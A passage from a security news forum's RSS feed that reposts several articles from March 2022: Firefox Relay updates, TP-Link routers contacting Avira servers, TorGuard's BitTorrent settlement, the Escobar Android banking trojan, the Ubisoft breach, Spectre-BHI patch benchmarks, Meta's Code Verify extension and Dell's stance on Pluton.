	Launched in August 2020, <a data-wpel-link="internal" href="https://www.ghacks.net/2020/08/22/firefox-relay-create-email-aliases-to-combat-spam-and-improve-privacy/" rel="external nofollow">Firefox Relay</a> was introduced as a free service available on a website and as a Firefox extension. Users who signed up for it with a Firefox account could set up email forwards for existing email addresses using aliases provided by the service. Emails would go through the Firefox Relay service, which meant that senders would communicate with the Firefox Relay alias address and not the user's "real" email address.
</p>

<p>
	 
</p>

<p>
	<a data-wpel-link="internal" href="https://www.ghacks.net/2021/11/22/mozilla-launches-firefox-relay-premium/" rel="external nofollow">Mozilla launched Firefox Relay Premium in November 2021</a>. The subscription-based service lifted several restrictions of the free plan, including the ability to reply to forwarded emails, use custom email domains, and use unlimited aliases instead of the 5 that the free plan offered.
</p>

<p>
	 
</p>

<p>
	The March 2022 Firefox Relay update improves the service in key areas. One of the big improvements increases the supported attachment size for all plans to 10 Megabytes. The previous limit of 150 Kilobytes blocked larger attachments from reaching the user's inbox. 10 Megabytes is still less than the usual 20-25 Megabyte attachment size limits of email services.
</p>

<p>
	 
</p>

<p>
	Another new feature introduced in the update is the ability to filter promotional emails. Premium Firefox Relay users may now block some or all promotional messages from a site. The new filter options complement the "none" and "all" options that Firefox Relay already supports. Mozilla <a data-wpel-link="external" href="https://relay.firefox.com/faq" rel="external nofollow" target="_blank">notes</a> that the blocking may not be 100% accurate, as non-promotional emails may also be blocked by the service. The organization recommends that important senders are not blocked using the functionality, as blocked emails can't be recovered. An option to recover blocked emails would probably have been a better design.
</p>

<p>
	 
</p>

<p>
	Last but not least, Firefox Relay is now also available as a browser extension for <a data-wpel-link="external" href="https://chrome.google.com/webstore/detail/firefox-relay/lknpoadjjkjcmjhbjpcljdednccbldeb?hl=en" rel="external nofollow" target="_blank">Google Chrome</a> and other Chromium-based browsers. The extension for the service improves its usability. Users may add Firefox Relay aliases quickly to sign-up forms and other email forms to use it without having to copy and paste addresses manually.
</p>

<h3>
	Closing words
</h3>

<p>
	The March 2022 improvements are beneficial to free and premium users. Free users benefit from the increased attachment size limit; premium users additionally get an option to block promotional emails.
</p>

<p>
	 
</p>

<p>
	The service has a long way to go functionality-wise, especially when compared to established services such as <a data-wpel-link="external" href="https://simplelogin.io/" rel="external nofollow" target="_blank">Simple Login</a>.
</p>

<p>
	 
</p>

<p>
	<strong>Now you</strong>: do you use email forwarding services?
</p>

<p>
	 
</p>


<p>
	 
</p>

<p>
	<a href="https://www.ghacks.net/2022/03/12/firefox-relay-update-brings-larger-attachment-sizes-and-a-filter-for-promotional-emails/" rel="external nofollow">Firefox Relay update brings larger attachment sizes and a filter for promotional emails</a>
</p>
]]></description><guid isPermaLink="false">4701</guid><pubDate>Sat, 12 Mar 2022 20:47:55 +0000</pubDate></item><item><title>Beware: TP-Link routers apparently sending customer data to Avira without user consent</title><link>https://nsaneforums.com/news/security-privacy-news/beware-tp-link-routers-apparently-sending-customer-data-to-avira-without-user-consent-r4697/</link><description><![CDATA[<p>
	For a few years now, TP-Link has been collaborating with Avira to provide various web-security solutions with its products like Wi-Fi routers. These features like HomeCare or HomeShield are meant to secure the users' connected devices against cyberattacks and various online threats.
</p>

<p>
	 
</p>

<p>
	However, a Redditor with the username ArmoredCavalry observed that their router, a TP-Link Archer AX3000, was sending loads of their data to the Avira SafeThings servers. The Redditor says that in 24 hours, more than 80,000 requests were made. They write:
</p>

<p>
	 
</p>

<p style="margin-left: 40px;">
	I recently enabled a DNS gateway to be able to see requests from my router and network devices. Was surprised to find 80K+ requests (in 24 hours) out to Avira "Safe Things" subdomains *.safethings.avira.com (far more than any other server).
</p>

<p>
	 
</p>

<p>
	For those wondering, SafeThings is a cloud-based threat intelligence platform that analyses user traffic. Here's how Avira defines SafeThings:
</p>

<p>
	 
</p>

<p style="margin-left: 40px;">
	Avira SafeThings is a cloud-based behavioral threat intelligence platform which interfaces with a service provider’s home router. It enables a connected home to operate securely without fear of compromised IoT devices. Service providers benefit from comprehensive report management options through the SafeThings Insights and Management Centre API. Consumers gain visibility and complete control over their home devices through a custom developed mobile app.
</p>


<p>
	 
</p>

<p>
	While Avira does say that users will be in control over their devices, the Redditor claims that the service continues to run on its own even though they haven't subscribed to it and all such related options are disabled on their device. The user writes:
</p>

<p>
	 
</p>

<p style="margin-left: 40px;">
	I have the Avira / Home Shield services completely turned off (I wasn't even subscribed to their paid service for it). The router doesn't care, and sends ALL your traffic to be "analyzed" anyhow.
</p>

<p>
	 
</p>

<p>
	Interestingly, this behavior was already confirmed earlier by XDA, which found that the TP-Link Deco X68 was exhibiting the same problem: it was sending out data even when the service was disabled. TP-Link said at the time that a future firmware would fix the issue, but XDA was seemingly never notified of such a release.
</p>


<p>
	 
</p>

<p>
	The XDA review says:
</p>

<p>
	 
</p>

<p style="margin-left: 40px;">
	TP-Link says the network activity is due to “the Avira cloud data base [distinguishing] whether [the network request is] secure data or malware.” A firmware update is in the works that will turn this functionality off if no Avira network features are enabled in the app, but there is no estimated timeline for that yet.
</p>

<p>
	 
</p>

<p>
	If you wish to check if your own TP-Link routers exhibit such behavior, you can use a DNS Gateway to observe it.
</p>

<p>
	 
</p>

<p>
	Source: ArmoredCavalry (<a href="https://www.reddit.com/r/hardware/comments/tbthjj/psa_newer_tplink_routers_send_all_your_web/" rel="external nofollow">Reddit</a>) via <a href="https://www.xda-developers.com/tp-link-deco-x68-review/#:~:text=Avira%20cloud%20data%20base" rel="external nofollow">XDA</a>
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/beware-tp-link-routers-apparently-sending-customer-data-to-avira-without-user-consent/" rel="external nofollow">Beware: TP-Link routers apparently sending customer data to Avira without user consent</a>
</p>
]]></description><guid isPermaLink="false">4697</guid><pubDate>Sat, 12 Mar 2022 20:30:36 +0000</pubDate></item><item><title>VPN provider bans BitTorrent after getting sued by film studios</title><link>https://nsaneforums.com/news/security-privacy-news/vpn-provider-bans-bittorrent-after-getting-sued-by-film-studios-r4696/</link><description><![CDATA[<p>
	"No logs" VPN provider TorGuard has reached a legal settlement this month with over two dozen movie studios that sued the company for encouraging piracy and copyright infringement.
</p>

<p>
	 
</p>

<p>
	In the settlement, TorGuard has agreed to block BitTorrent traffic for its users.
</p>

<h2>
	TorGuard VPN to block torrents using firewall
</h2>

<p>
	Last year, <a href="https://securityreport.com/movie-studios-sue-torguard-after-10-million-legal-battle-with-liquidvpn/" rel="external nofollow" target="_blank">over two dozen film studios had sued TorGuard</a>, claiming the VPN provider maintained no logs and encouraged online piracy through its marketing efforts.
</p>

<p>
	 
</p>

<p>
	The same set of plaintiffs had earlier demanded $10 million in "damages" from another log-less VPN provider, LiquidVPN.
</p>

<p>
	 
</p>

<p>
	According to court documents obtained by BleepingComputer, both the film studios and VPNetworks, LLC d.b.a. TorGuard, have now agreed to a settlement in which the VPN provider will block torrents on its network.
</p>

<p>
	 
</p>

<p>
	TorGuard will "use commercially reasonable efforts to block BitTorrent traffic on its servers in the United States using firewall technology," reveal the documents.
</p>

<h2>
	TorGuard blames host for ignoring over 100,000 piracy notices
</h2>

<p>
	Since June 2012, TorGuard had been leasing servers and IP addresses from hosting provider QuadraNet, until late 2021 when the VPN provider notified QuadraNet that it was terminating the service.
</p>

<p>
	 
</p>

<p>
	Some of these servers were used by TorGuard to offer SOCKS5 proxy services to its customers.
</p>

<p>
	 
</p>

<p>
	TorGuard's Knowledgebase (KB) had <a href="https://torguard.net/knowledgebase.php?action=displayarticle&amp;id=241" rel="external nofollow" target="_blank">detailed instructions</a> on how customers could configure its proxy servers to work with existing BitTorrent clients:
</p>

<p>
	 
</p>

<p>
	<img alt="qBittorrent_10_201DEBE6.png" class="ipsImage" data-ratio="75.10" height="540" width="678" src="https://www.bleepstatic.com/images/news/u/1164866/2022/Mar-2022/torguard-vpn/qBittorrent_10_201DEBE6.png">
</p>

<div>
	<figure>
		<figcaption>
			TorGuard SOCKS5 proxy servers can be used with BitTorrent clients
		</figcaption>
	</figure>
</div>

<p>
	Note, unlike with VPNs, traffic routed through SOCKS5 proxy servers is by default unencrypted, making it possible for intermediary hosting providers to gain visibility into the network flows, should they choose to.
</p>

<p>
	 
</p>

<p>
	Records produced by the film studios show that 97,640 copyright infringement notices were sent to QuadraNet confirming instances of piracy at the SOCKS5 IPs assigned to TorGuard.
</p>

<p>
	 
</p>

<p>
	An additional 47,219 notices confirmed piracy associated with other TorGuard IP addresses, through November 2021.
</p>

<p>
	 
</p>

<p>
	Plaintiffs' attorneys shared an Excel spreadsheet with TorGuard showing 250,000 "hit dates of confirmed infringement." Of these records, about 40% of copyright infringement instances were associated with one SOCKS5 IP address alone that had been provisioned to TorGuard.
</p>

<p>
	 
</p>

<p>
	"Because traffic on TorGuard’s SOCKS5 proxy servers is not encrypted,... QuadraNet could have used conventional network monitoring tools to capture data packets of the piracy and confirm the piracy in the notices plaintiffs sent to QuadraNet," argue the plaintiffs' lawyers.
</p>

<p>
	 
</p>

<p>
	The film studios further argue that network monitoring technologies like <a href="https://en.wikipedia.org/wiki/Deep_packet_inspection" rel="external nofollow" target="_blank">deep packet inspection</a> could have been used to respond to piracy notices and block infringing flows.
</p>

<p>
	 
</p>

<p>
	TorGuard has blamed the mishap on its hosting provider, QuadraNet, for failing to forward copyright violation notices to TorGuard's registered DMCA agent in a timely manner.
</p>

<p>
	 
</p>

<p>
	"TorGuard values intellectual property rights of others, as stated in TorGuard's publicly posted policies. Had QuadraNet sent these notices to our DMCA agent, TorGuard's ordinary business practices would have been to immediately take steps to stop further piracy."
</p>

<p>
	 
</p>

<p>
	When TorGuard notified QuadraNet that it was terminating its relationship with the hosting provider, "Quadranet tried to persuade TorGuard to continue service by offering different terms," state the court documents.
</p>

<p>
	 
</p>

<p>
	It is a common practice in the hosting industry for a provider to "<a href="https://en.wikipedia.org/wiki/Black_hole_(networking)" rel="external nofollow" target="_blank">null route</a>" a subscriber's IP address, effectively terminating a network connection, where it has received multiple notices of copyright infringement associated with an IP address.
</p>

<p>
	 
</p>

<p>
	"If QuadraNet had null routed one of the IP addresses assigned to TorGuard where plaintiffs sent notices or at least forwarded the notices to TorGuard's DMCA agent, TorGuard would have taken immediate steps to stop further piracy such as suspending users and adopting a firewall to filter out BitTorrent traffic as it has now begun to do," explains the VPN provider.
</p>

<p>
	 
</p>

<p>
	In September 2021, the same group of <a href="https://torrentfreak.com/hosting-company-quadranet-asks-court-to-dismiss-vpn-piracy-lawsuit-210910/" rel="external nofollow" target="_blank">film studios had sued QuadraNet</a> for not null-routing infringing VPN IPs. Luckily though, the plaintiff's earlier complaint centered around VPN (encrypted) traffic and made no mention of SOCKS5 proxies.
</p>

<p>
	 
</p>

<p>
	As such, the court had to <a href="http://torrentfreak.com/hosting-company-defeats-filmmakers-vpn-piracy-lawsuit-in-court-211214/" rel="external nofollow" target="_blank">dismiss the lawsuit</a> and side with QuadraNet who claimed it had no visibility into encrypted VPN traffic and "was never aware of the end users' online activity" on its servers.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/vpn-provider-bans-bittorrent-after-getting-sued-by-film-studios/" rel="external nofollow">VPN provider bans BitTorrent after getting sued by film studios</a>
</p>
]]></description><guid isPermaLink="false">4696</guid><pubDate>Sat, 12 Mar 2022 20:27:33 +0000</pubDate></item><item><title>Android malware Escobar steals your Google Authenticator MFA codes</title><link>https://nsaneforums.com/news/security-privacy-news/android-malware-escobar-steals-your-google-authenticator-mfa-codes-r4695/</link><description><![CDATA[<p>
	The Aberebot Android banking trojan has returned under the name 'Escobar' with new features, including stealing Google Authenticator multi-factor authentication codes.
</p>

<p>
	 
</p>

<p>
	The new features in the latest Aberebot version also include taking control of the infected Android devices using VNC, recording audio, and taking photos, while also expanding the set of targeted apps for credential theft.
</p>

<p>
	 
</p>

<p>
	The main goal of the trojan is to steal enough information to allow the threat actors to take over victims' bank accounts, siphon available balances, and perform unauthorized transactions.
</p>

<h2>
	Rebranded as Escobar
</h2>

<p>
	Using <a href="https://ke-la.com/" rel="external nofollow" target="_blank">KELA</a>'s cyber-intelligence DARKBEAST platform, BleepingComputer found a forum post on a Russian-speaking hacking forum from February 2022 where the Aberebot developer promotes their new version under the name 'Escobar Bot Android Banking Trojan.'
</p>

<p>
	 
</p>

<p>
	<img alt="post.jpg" class="ipsImage" data-ratio="75.10" height="540" width="398" src="https://www.bleepstatic.com/images/news/u/1220909/Forum%20and%20Marketplace%20Posts/post.jpg">
</p>

<div>
	<figure>
		<figcaption>
			Seller's post on a darknet forum (KELA)
		</figcaption>
	</figure>
</div>

<p>
	The malware author is renting the beta version of the malware for $3,000 per month to a maximum of five customers, with threat actors having the ability to test the bot for free for three days.
</p>

<p>
	 
</p>

<p>
	The threat actor plans on raising the malware's price to $5,000 after development is finished.
</p>

<p>
	 
</p>

<p>
	MalwareHunterTeam first spotted the suspicious APK on March 3, 2022, masquerading as a McAfee app, and warned that it evaded detection by the vast majority of anti-virus engines.
</p>

<p>
	 
</p>


<p>
	 
</p>

<p>
	This was picked up by <a href="https://blog.cyble.com/2022/03/10/aberebot-returns-as-escobar/" rel="external nofollow" target="_blank">researchers at Cyble</a>, who performed an analysis of the new 'Escobar' variant of the Aberebot trojan.
</p>

<p>
	 
</p>

<p>
	According to the same analysts, Aberebot first appeared in the wild in <a href="https://blog.cyble.com/2021/07/30/aberebot-on-the-rise-new-banking-trojan-targeting-users-through-phishing/" rel="external nofollow" target="_blank">the summer of 2021</a>, so the appearance of a new version indicates active development.
</p>

<h2>
	Old and new capabilities
</h2>

<p>
	Like <a href="https://www.bleepingcomputer.com/news/security/new-xenomorph-android-malware-targets-customers-of-56-banks/" target="_blank" rel="external nofollow">most banking trojans</a>, Escobar displays overlay login forms to hijack user interactions with e-banking apps and websites and steal credentials from victims.
</p>

<p>
	 
</p>

<p>
	The malware also packs several other features that make it potent against any Android version, even if the overlay injections are blocked in some manner.
</p>

<p>
	 
</p>

<p>
	The authors have expanded the set of targeted banks and financial institutions to a whopping 190 entities from 18 countries in the latest version.
</p>

<p>
	 
</p>

<p>
	The malware requests 25 permissions, of which 15 are abused for malicious purposes. Examples include accessibility, audio recording, reading SMS, read/write storage, getting the account list, disabling the keylock, making calls, and accessing the precise device location.
</p>

<p>
	 
</p>

<p>
	Everything that the malware collects is uploaded to the C2 server, including SMS and call logs, key logs, notifications, and Google Authenticator codes.
</p>

<p>
	 
</p>

<p>
	<img alt="authenticator-code.jpg" class="ipsImage" data-ratio="9.72" height="67" width="720" src="https://www.bleepstatic.com/images/news/u/1220909/Android%20malware/authenticator-code.jpg">
</p>

<div>
	<figure>
		<figcaption>
			Code to snatch Google Authenticator codes (Cyble)
		</figcaption>
	</figure>
</div>

<p>
	The above is enough to help the crooks overcome two-factor authentication obstacles when assuming control of e-banking accounts.
</p>

<p>
	 
</p>

<p>
	2FA codes arrive via SMS or are generated and rotated by HMAC-based one-time-password apps like Google Authenticator. The latter is considered safer because it is not susceptible to SIM swap attacks, but it is still not protected from malware running in the device's userspace.
</p>

<p>
	 
</p>

<p>
	Moreover, the addition of VNC Viewer, a cross-platform screen sharing utility with remote control features, gives the threat actors a new powerful weapon to do whatever they want when the device is unattended.
</p>

<p>
	 
</p>

<p>
	<img alt="VNC-code.jpg" class="ipsImage" data-ratio="49.44" height="338" width="720" src="https://www.bleepstatic.com/images/news/u/1220909/Android%20malware/VNC-code.jpg">
</p>

<div>
	<figure>
		<figcaption>
			VNC Viewer code in Aberebot (Cyble)
		</figcaption>
	</figure>
</div>

<p>
	Apart from the above, Aberebot can also record audio clips or take screenshots and exfiltrate both to the actor-controlled C2, with the complete list of supported commands listed below.
</p>

<p>
	 
</p>

<p>
	<img alt="commands.jpg" class="ipsImage" data-ratio="66.94" height="432" width="720" src="https://www.bleepstatic.com/images/news/u/1220909/Tables/commands.jpg">
</p>

<div>
	<figure>
		<figcaption>
			Table of commands accepted by Aberebot (Cyble)
		</figcaption>
	</figure>
</div>

<h2>
	Should we be concerned?
</h2>

<p>
	It is still early to tell how popular the new Escobar malware will become in the cybercrime community, especially at a relatively high price. Nevertheless, it's now powerful enough to entice a wider audience.
</p>

<p>
	 
</p>

<p>
	Also, its operational model, which involves random actors that can rent it, means its distribution channels and methods may vary greatly.
</p>

<p>
	 
</p>

<p>
	In general, you can minimize the chances of being infected with Android trojans by avoiding the installation of APKs outside of Google Play, using a mobile security tool, and ensuring that Google Play Protect is enabled on your device.
</p>

<p>
	 
</p>

<p>
	Additionally, when installing a new app from any source, pay attention to unusual requests for permissions and monitor the app's battery and network consumption stats for the first few days to identify any suspicious patterns.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/android-malware-escobar-steals-your-google-authenticator-mfa-codes/" rel="external nofollow">Android malware Escobar steals your Google Authenticator MFA codes</a>
</p>
]]></description><guid isPermaLink="false">4695</guid><pubDate>Sat, 12 Mar 2022 20:23:19 +0000</pubDate></item><item><title>Ubisoft says it experienced a &#x2018;cyber security incident&#x2019;, and the purported Nvidia hackers are taking credit</title><link>https://nsaneforums.com/news/security-privacy-news/ubisoft-says-it-experienced-a-%E2%80%98cyber-security-incident%E2%80%99-and-the-purported-nvidia-hackers-are-taking-credit-r4692/</link><description><![CDATA[<h3>
	Ubisoft believes no personal player information was exposed
</h3>

<p>
	 
</p>

<p>
	Ubisoft experienced a “cyber security incident” last week that temporarily disrupted some games, systems, and services, the company <a href="https://news.ubisoft.com/en-gb/article/3tSsBh25mhHhlbGSy1xbRw/ubisoft-cyber-security-incident-update" rel="external nofollow">reported Thursday</a>. Ubisoft hasn’t said who might be responsible, but on Friday evening, the group who purportedly hacked Nvidia took credit.
</p>

<p>
	 
</p>

<p>
	Ubisoft said it believes that “at this time there is no evidence any player personal information was accessed or exposed as a by-product of this incident” and says that games and services are now “functioning normally.” Out of caution, the company also “initiated a company-wide password reset.” When asked for comment, Ubisoft spokesperson Jessica Roache said the company had no additional details to share.
</p>

<p>
	 
</p>

<p>
	News of the incident arrives amid a recent wave of high-profile hacks. Nvidia confirmed on March 1st that it was hacked and <a href="https://www.pcmag.com/news/nvidia-confirms-company-data-was-stolen-in-hack" rel="external nofollow">said that</a> the hackers are leaking employee credentials and proprietary information. Samsung said on March 7th that <a href="https://www.theverge.com/2022/3/7/22965220/samsung-hack-lapsus-galaxy-source-code-confirmed-nvidia" rel="external nofollow">hackers stole</a> internal company data and source code for Galaxy devices. The LAPSUS$ hacking group has taken responsibility for those two breaches.
</p>

<p>
	 
</p>

<p>
	But that may not be all. On Friday, in a Telegram channel allegedly run by LAPSUS$, the group posted a link to this article and the <a href="https://emojipedia.org/smirking-face/" rel="external nofollow">smirking face emoji</a>, seemingly taking responsibility for the Ubisoft incident, too. In response to a user in the channel, the group “confirmed” that it did not target Ubisoft’s customer information. Ubisoft didn’t immediately reply to a request for comment on the claims.
</p>

<p>
	 
</p>

<p>
	<img alt="Screen_Shot_2022_03_11_at_4.08.20_PM.png" class="ipsImage" data-ratio="87.92" height="524" width="596" src="https://cdn.vox-cdn.com/thumbor/0ok-mb3pAxqFEuGjNGuNLXgehB8=/0x0:596x524/920x0/filters:focal(0x0:596x524):format(webp):no_upscale()/cdn.vox-cdn.com/uploads/chorus_asset/file/23308189/Screen_Shot_2022_03_11_at_4.08.20_PM.png">
</p>

<p>
	Here is a screenshot sent by a tipster of the Telegram channel. The Verge separately saw the messages in the channel as well.
</p>

<p>
	 
</p>

<p>
	<strong>Update March 11th, 7:36PM ET:</strong> Added that a group allegedly representing LAPSUS$ is taking credit.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.theverge.com/2022/3/11/22972768/ubisoft-cyber-security-incident-hack" rel="external nofollow">Ubisoft says it experienced a ‘cyber security incident’, and the purported Nvidia hackers are taking credit</a>
</p>
]]></description><guid isPermaLink="false">4692</guid><pubDate>Sat, 12 Mar 2022 01:00:39 +0000</pubDate></item><item><title>Even modern Intel CPUs are losing up to 36% performance with the new Spectre BHI patch</title><link>https://nsaneforums.com/news/security-privacy-news/even-modern-intel-cpus-are-losing-up-to-36-performance-with-the-new-spectre-bhi-patch-r4678/</link><description><![CDATA[<p>
	VUSec - the systems and network security group at the Vrije Universiteit (VU) Amsterdam research institute - <a href="https://www.vusec.net/projects/bhi-spectre-bhb/" rel="external nofollow">disclosed details</a> about a new vulnerability based on the <a href="https://www.neowin.net/news/tags/spectre_variant_2/" rel="external nofollow">infamous Spectre v2</a> that affects both Intel and Arm CPUs. AMD CPUs, however, are unaffected.
</p>

<p>
	 
</p>

<p>
	The Spectre family of vulnerabilities in general exploits CPUs that use branch prediction or speculative execution, and VUSec notes that this new variant can even circumvent the Enhanced Indirect Branch Restricted Speculation (EIBRS) hardware mitigation (or CSV2 in the case of Arm) by abusing the branch history buffer (BHB). Hence, the new variant is called Spectre-BHB or Branch History Injection (BHI).
</p>

<p>
	 
</p>

<p>
	Consequently, Linux security patches for x86 processors were also released on the same day and <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=4a01e748a51cdc0527fdc913546dd46e822aa00d" rel="external nofollow">added to the Linux 5.17 mainline kernel</a>. As such, Phoronix decided to test the patch on a couple of Intel processors to see the performance impact that it can have.
</p>

<p>
	 
</p>

<p>
	First, we have the latest 12th Gen Alder Lake-S Core i9-12900K, and the processor loses up to 26.7% performance when measuring Sockperf throughput. In the other tests, the i9-12900K loses anywhere between 2% and 14.5% with the Spectre-BHB patch.
</p>

<p>
	 
</p>

<p>
	<img alt="1647006924_12900k_spectre_bhi_retpoline_" class="ipsImage" data-ratio="75.10" height="540" width="531" src="https://cdn.neow.in/news/images/uploaded/2022/03/1647006924_12900k_spectre_bhi_retpoline_perf_impact_(source-_phoronix)_story.jpg">
</p>

<p>
	 
</p>

<p>
	An 11th Gen Tiger Lake Core i7-1185G7 processor was also tested, and this time the maximum loss is even greater: the unpatched system performed up to 35.6% better. In another test, the unpatched system was 34.1% faster. In the remaining tests, the patch cost anywhere between 2% and 26.1% of performance.
</p>

<p>
	 
</p>

<p>
	<img alt="1647006917_1185g7_spectre_bhi_retpoline_" class="ipsImage" data-ratio="75.10" height="540" width="650" src="https://cdn.neow.in/news/images/uploaded/2022/03/1647006917_1185g7_spectre_bhi_retpoline_perf_impact_(source-_phoronix)_story.jpg">
</p>

<p>
	 
</p>

<p>
	Interestingly, as you can see in the case of the Selenium benchmark, the i7-1185G7 actually gained a little performance (2.2%) on the patched machine.
</p>

<p>
	 
</p>

<p>
	You can read about the full test setup and such in the original Phoronix article linked at the source below.
</p>

<p>
	 
</p>

<p>
	Source and images: <a href="https://www.phoronix.com/scan.php?page=article&amp;item=spectre-bhi-retpoline" rel="external nofollow">Phoronix</a>
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/even-modern-intel-cpus-are-losing-up-to-36-performance-with-the-new-spectre-bhi-patch/" rel="external nofollow">Even modern Intel CPUs are losing up to 36% performance with the new Spectre BHI patch</a>
</p>
]]></description><guid isPermaLink="false">4678</guid><pubDate>Fri, 11 Mar 2022 20:42:31 +0000</pubDate></item><item><title>Meta releases Code Verify extension for WhatsApp Web</title><link>https://nsaneforums.com/news/security-privacy-news/meta-releases-code-verify-extension-for-whatsapp-web-r4677/</link><description><![CDATA[<p>
	Meta released the new Code Verify browser extension for Google Chrome and Microsoft Edge to validate the code served by WhatsApp Web. A version of the extension for Firefox is still under development, but will be released soon according to the announcement.
</p>

<p>
	 
</p>

<p>
	<img alt="whatsapp-code-verify.webp" class="ipsImage" data-ratio="75.10" height="405" width="720" src="https://www.ghacks.net/wp-content/uploads/2022/03/whatsapp-code-verify.webp">
</p>

<p>
	 
</p>

<p>
	WhatsApp users have several options when it comes to signing in to the service and starting to communicate with individuals and via groups. Besides using mobile devices running Android or iOS, WhatsApp users may also use WhatsApp Desktop, a Windows 10 and 11 application, and WhatsApp Web, a web-based version of the messaging service.
</p>

<p>
	 
</p>

<p>
	Code Verify is an open source extension that "confirms that your WhatsApp Web code hasn't been tampered with or altered, and that the WhatsApp Web experience you're getting is the same as everyone else's" according to the description <a data-wpel-link="external" href="https://github.com/facebookincubator/meta-code-verify/" rel="external nofollow" target="_blank">on GitHub</a>.
</p>

<p>
	 
</p>

<p>
	Meta promises that the extension does not log "any data, metadata, or user data" and that it "does not share any information with WhatsApp". Messages are not read or accessed and neither Meta nor WhatsApp will know if Code Verify is being used in the browser. Code Verify's sole purpose is to verify the integrity of WhatsApp Web to ensure that the site is secure to use.
</p>

<p>
	 
</p>

<p>
	The extension checks the integrity of the WhatsApp Web code when users connect to the service with a browser the extension is installed in. It displays a green, orange or red icon indicating whether WhatsApp Web has been validated successfully (green), the integrity check could not be completed (orange), or validation failed (red).
</p>

<p>
	 
</p>

<p>
	WhatsApp users know immediately that something is wrong if the icon turns orange or red when they connect to WhatsApp Web.
</p>

<p>
	 
</p>

<p>
	Code Verify will run immediately, and if the WhatsApp Web code is fully validated, the Code Verify icon in the browser will appear green.
</p>

<p>
	 
</p>

<p>
	If the Code Verify icon appears orange, it means that you need to refresh your page or another browser extension is interfering with Code Verify. In this instance, Code Verify will recommend that you pause your other browser extensions.
</p>

<p>
	 
</p>

<p>
	If the Code Verify icon appears red, it will indicate that there is a possible security issue with the WhatsApp Web code you’re being served.
</p>

<p>
	 
</p>

<p>
	Meta released Code Verify as open source to increase user trust in the extension, improve its own security and give other developers the opportunity to fork the extension and use it for their own projects in a similar manner.
</p>

<p>
	 
</p>

<p>
	Interested users may download the <a data-wpel-link="external" href="https://chrome.google.com/webstore/detail/code-verify/llohflklppcaghdpehpbklhlfebooeog" rel="external nofollow" target="_blank">Chrome</a> and <a data-wpel-link="external" href="https://microsoftedge.microsoft.com/addons/detail/code-verify/cpndjjealjjagamdecpipjfamiigaknk" rel="external nofollow" target="_blank">Edge </a>extension from the official extension stores. The Firefox version has not been released yet.
</p>

<p>
	 
</p>

<p>
	<strong>Now You</strong>: do you use WhatsApp Web or WhatsApp? Would you use Code Verify?
</p>

<p>
	 
</p>


<p>
	 
</p>

<p>
	<a href="https://www.ghacks.net/2022/03/11/meta-releases-code-verify-extension-for-whatsapp-web/" rel="external nofollow">Meta releases Code Verify extension for WhatsApp Web</a>
</p>
]]></description><guid isPermaLink="false">4677</guid><pubDate>Fri, 11 Mar 2022 20:40:04 +0000</pubDate></item><item><title>Microsoft Pluton doesn&#x2019;t &#x201C;align&#x201D; with Dell&#x2019;s hardware security strategy</title><link>https://nsaneforums.com/news/security-privacy-news/microsoft-pluton-doesn%E2%80%99t-%E2%80%9Calign%E2%80%9D-with-dell%E2%80%99s-hardware-security-strategy-r4676/</link><description><![CDATA[<h3>
	Microsoft's security chip has yet to be integrated with Intel CPUs.
</h3>

<p>
	 
</p>

<div itemprop="articleBody">
	
	<p>
		Dell, one of the <a href="https://www.idc.com/getdoc.jsp?containerId=prUS48770422" rel="external nofollow">top three</a> PC makers, will not be using <a href="https://arstechnica.com/information-technology/2022/01/pluton-microsofts-new-security-chip-will-finally-be-put-to-the-test/" rel="external nofollow">Microsoft’s Pluton</a> chip in “most” commercial PCs, <a href="https://www.theregister.com/2022/03/09/dell_pluton_microsoft/" rel="external nofollow">The Register</a> reported on Wednesday. A Dell representative told the publication that the security processor “does not align with Dell's approach to hardware security and our most secure commercial PC requirements."
	</p>

	<p>
		 
	</p>

	<p>
		Microsoft first announced the Pluton security processor in 2020. At that point, the chip had already been used in microcontrollers in the Xbox One and Azure Sphere to prevent hardware hacks.
	</p>

	<p>
		 
	</p>

	<p>
		In PCs, Pluton is meant to prevent hacks that could result from an attacker having physical access to the PC. Such physical hacks could result in malware installation or stolen data. By living on the main CPU’s die, Pluton can store protected data in an area that is isolated from the PC’s other components. According to Microsoft, that data can’t be removed no matter what.
	</p>

	<p>
		 
	</p>

	<p>
		Pluton can also serve as a Trusted Platform Module (TPM), which Microsoft requires in order for a system to run <a href="https://arstechnica.com/gadgets/2021/10/windows-11-the-ars-technica-review/" rel="external nofollow">Windows 11</a>.
	</p>

	<p>
		 
	</p>

	<p>
		The primary reason Dell won’t be using Pluton yet is that <a href="https://arstechnica.com/gadgets/2021/11/intels-alder-lake-big-little-cpu-design-tested-its-a-barn-burner/" rel="external nofollow">Intel’s 12th-generation Core</a> processors, including the <a href="https://arstechnica.com/gadgets/2022/01/testing-intels-12th-gen-alder-lake-laptop-cpus-many-cores-make-light-work/" rel="external nofollow">mobile SKUs</a> geared for Dell’s business laptops, don’t use it. Instead, as reported by <a href="https://www.theregister.com/2022/03/02/microsoft_pluton_chip/" rel="external nofollow">The Register</a> last week, Intel is relying on its Platform Trust Technology, which has been employed by Intel chipsets for years and uses a TPM 2.0.
	</p>

	<p>
		 
	</p>

	<p>
		Additionally, Dell’s 12th-gen-based laptops will use modules that meet the National Institute of Standards and Technology’s <a href="https://csrc.nist.gov/publications/detail/fips/140/2/final" rel="external nofollow">FIPS 140-2</a> standard for cryptographic modules. The computers will also be Trusted Computing Group-certified, The Register noted.
	</p>

	<p>
		 
	</p>

	<p>
		Dell is open to using Pluton someday, however. The company told The Register that it will “continue to evaluate Pluton to see how it compares against existing TPM implementations in the future.” Similarly, Lenovo ThinkPads running Intel 12th-gen CPUs will not use Microsoft’s security chip “at launch,” according to a Lenovo rep who spoke with The Register.
	</p>

	<p>
		 
	</p>

	<p>
